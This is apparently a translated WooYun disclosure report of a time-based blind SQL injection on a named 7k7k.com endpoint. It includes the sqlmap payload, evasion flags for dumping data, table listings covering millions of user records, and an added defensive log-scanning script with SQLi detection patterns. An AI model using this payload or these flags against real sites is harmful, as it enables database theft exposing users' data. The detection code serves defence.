Vulnerability summary

Defect ID: wooyun-2015-0112152

Title: SQL injection on a 奇客星空 site involving data of more than 4 million users

Vendor: 奇客星空

Author: 路人甲

Submitted: 2015-05-05 12:50

Fixed: 2015-06-19 16:12

Published: 2015-06-19 16:12

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure timeline:

2015-05-05: Details sent to the vendor; awaiting vendor response
2015-05-05: Vendor confirmed; details visible to the vendor only
2015-05-15: Details disclosed to core white hats and domain experts
2015-05-25: Details disclosed to regular white hats
2015-06-04: Details disclosed to intern white hats
2015-06-19: Details disclosed to the public

Brief description:

233

Detailed description:

URL: http://web.7k7k.com/phone/h.php?id=
Payload reference:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: id=(SELECT (CASE WHEN (9533=9533) THEN SLEEP(5) ELSE 9533*(SELECT 9533 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
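The payload above is a time-based blind probe: the injected CASE forces a SLEEP(5) when the condition holds, so a successful probe leaves a slow request in the web server's access log. The following detection logic is an added example and is not part of the original report; it assumes a combined-format access log with a trailing request-time field, and the log lines, client addresses and the `inspect_request`/`scan_log` helpers are constructed for this illustration.

```python
"""Added defender-side example (not from the report): flag time-based blind SQLi probes
against an integer-only GET parameter in access logs (combined format + request time)."""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Markers of time-based blind probes like the sqlmap payload in the report. NOT BETWEEN is
# included because sqlmap's `between` tamper rewrites comparisons that way.
TIME_BLIND_MARKERS = re.compile(
    r"\b(?:SLEEP|BENCHMARK|PG_SLEEP|WAITFOR)\s*\(|\bCASE\s+WHEN\b"
    r"|\bINFORMATION_SCHEMA\b|\bNOT\s+BETWEEN\b",
    re.IGNORECASE,
)
LOG_RE = re.compile(r'^(?P<ip>\S+) .*? "(?P<method>\S+) (?P<uri>\S+) \S+" '
                    r'(?P<status>\d{3}) \S+ (?P<rt>[\d.]+)$')

def inspect_request(uri, response_time, int_params=("id",), slow_seconds=4.0):
    """Return the findings for one request; an empty list means nothing suspicious."""
    findings = []
    for name, values in parse_qs(urlsplit(uri).query, keep_blank_values=True).items():
        for raw in values:
            value = unquote_plus(raw)  # parse_qs decoded once; also catch double encoding
            if name in int_params and not re.fullmatch(r"-?\d+", value):
                findings.append(f"non-integer value for {name}")
            if TIME_BLIND_MARKERS.search(value):
                findings.append(f"time-based blind marker in {name}")
    # A successful SLEEP(5) probe shows up as a slow response for that same request.
    if findings and response_time >= slow_seconds:
        findings.append(f"slow response {response_time:.1f}s matches sleep probe")
    return findings

def scan_log(lines):
    """Return (client_ip, uri, findings) for every suspicious request in the log."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            findings = inspect_request(m["uri"], float(m["rt"]))
            if findings:
                hits.append((m["ip"], m["uri"], findings))
    return hits

# Constructed sample log: the report's payload URL-encoded, a benign request, and a
# malformed non-numeric id without timing markers (addresses are RFC 5737 ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [05/May/2015:12:50:01 +0800] "GET /phone/h.php?id=(SELECT%20(CASE'
    '%20WHEN%20(9533=9533)%20THEN%20SLEEP(5)%20ELSE%209533*(SELECT%209533%20FROM'
    '%20INFORMATION_SCHEMA.CHARACTER_SETS)%20END)) HTTP/1.1" 200 512 5.012',
    '198.51.100.7 - - [05/May/2015:12:50:02 +0800] "GET /phone/h.php?id=123 HTTP/1.1" 200 512 0.031',
    '203.0.113.5 - - [05/May/2015:12:50:09 +0800] "GET /phone/h.php?id=abc HTTP/1.1" 500 0 0.028',
]
```

Running `scan_log(SAMPLE_LOG)` reports the first and third lines; the first carries all three findings because the probe's 5-second response time confirms the sleep fired.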

Proof of vulnerability:

When dumping data with sqlmap, remember to add tamper=between --no-cast
Database: web7k
[299 tables]
Database: web7k
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| uc_vip_users | 65420   |
| uc_user1     | 4279108 |
| uc_user7     | 4273494 |
+--------------+---------+

Fix recommendation:

Asking for 20 rank!

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-05-05 16:11

Vendor reply:

Thanks to the white hat for the report; the relevant staff have been notified to handle it.

Latest status:

None yet